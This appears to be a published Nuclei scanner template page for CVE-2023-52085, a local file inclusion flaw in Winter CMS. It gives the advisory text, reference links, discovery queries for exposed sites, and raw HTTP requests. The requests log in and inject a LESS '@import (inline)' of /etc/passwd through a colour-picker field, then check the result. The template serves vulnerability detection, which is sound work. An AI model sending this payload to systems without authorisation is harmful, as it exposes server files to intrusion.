Winter CMS Local File Inclusion - (LFI)

ID: CVE-2023-52085

Severity: medium

Author: sanineng

Tags: cve,cve2023,authenticated,lfi,wintercms

Description

Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.

YAML Source

id: CVE-2023-52085

info:
  name: Winter CMS Local File Inclusion - (LFI)
  author: sanineng
  severity: medium
  description: |
    Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.
  reference:
    - https://github.com/wintercms/winter/security/advisories/GHSA-2x7r-93ww-cxrq
    - https://nvd.nist.gov/vuln/detail/CVE-2023-52085
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-52085
    cwe-id: CWE-22
    epss-score: 0.00256
    epss-percentile: 0.65415
    cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: wintercms
    product: winter
    shodan-query:
      - "title:\"Winter CMS\""
      - http.title:"winter cms"
    fofa-query:
      - "title=\"Winter CMS\""
      - title="winter cms"
    google-query: intitle:"winter cms"
  tags: cve,cve2023,authenticated,lfi,wintercms

http:
  - raw:
      - |
        GET /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _token={{_token}}&postback=1&login={{username}}&password={{password}}

      - |
        POST /backend/system/mailbrandsettings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-WINTER-REQUEST-HANDLER: onSave
        X-WINTER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0

      - |
        GET /backend/system/mailbrandsettings HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: regex
        part: body_4
        regex:
          - "root:[x*]:0:0:"

    extractors:
      - type: regex
        part: body
        name: _token
        group: 1
        regex:
          - '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
        internal: true
# digest: 4b0a0048304602210099344c1ec025a062d80a74847d51d07b39b6aa1483ebecf43457c5829ee7fe68022100b7bd5893e26d41a71eab52c637fe7ea74a5e3025435b4062760765949f867acb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-52085.yaml"

View on Github